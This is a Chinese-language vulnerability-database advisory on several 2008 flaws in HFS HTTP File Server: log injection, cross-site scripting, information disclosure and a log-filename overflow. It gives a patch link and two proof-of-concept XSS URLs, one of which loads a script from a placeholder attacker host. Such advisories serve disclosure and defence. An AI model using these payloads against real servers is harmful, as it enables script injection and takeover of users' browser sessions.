Lucene search
RootSSV:2868HistoryJan 26, 2008 - 12:00 a.m.
HFS HTTP File Server多个远程安全漏洞
2008-01-2600:00:00
Root
www.seebug.org
60
EPSS
0.113
Percentile
95.3%
BUGTRAQ ID: 27423
CVE(CAN) ID: CVE-2008-0405,CVE-2008-0406,CVE-2008-0407,CVE-2008-0408,CVE-2008-0409,CVE-2008-0410
HTTP File Server是用于共享文件的开源HTTP服务器。
HFS没有正确地记录某些输入,用户可以在登陆时伪造用户名将任意内容注入到日志文件中。
HFS没有正确地过滤某些输入便将其返回给了用户,这可能导致在受影响服务器的用户浏览器会话中执行任意HTML和脚本代码。
远程攻击者可以通过向服务器提交包含有模板符号的特制请求导致泄露某些信息,如连接数、传输速度、通讯统计或运行时间等。
HFS没有正确地处理用户名便使用用户名创建日志文件的文件名,这可能允许攻击者通过向服务器提交恶意请求导致创建目录、向文件附加数据,或触发缓冲区溢出。成功攻击允许执行任意代码,但要求使用了%user%模板符号定义日志文件的名称。
HFS HTTP File Server 1.5g - 2.3(Beta Build#174)
HFS
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&big_mirror=0” target=“_blank”>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&big_mirror=0</a>
http://<script>alert('Syhunt%20XSS')<%2fscript>a:x@[host]/
http://<script>var%20sChar=String%2efromCharCode(58)%3bdocument%2ewrite('<script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom%2fxss%2ejs><%5c%2fscript>')
Related
exploitpack
exploitpack
Rejetto HTTP File Server (HFS) 1.52.x - Multiple Vulnerabilities
2008-01-23 00:00:00
seebug
seebug
HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities
2014-07-01 00:00:00
securityvulns
securityvulns
packetstorm
packetstorm
hfshack.txt
2008-01-24 00:00:00
hfs-xss.txt
2008-01-24 00:00:00
exploitdb
exploitdb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities
2008-01-23 00:00:00
nvd
nvd
prion
prion
Design/Logic Flaw
2008-01-29 00:00:00
Cross site scripting
2008-01-29 00:00:00
Directory traversal
2008-01-29 00:00:00
cve
cve
cvelist
cvelist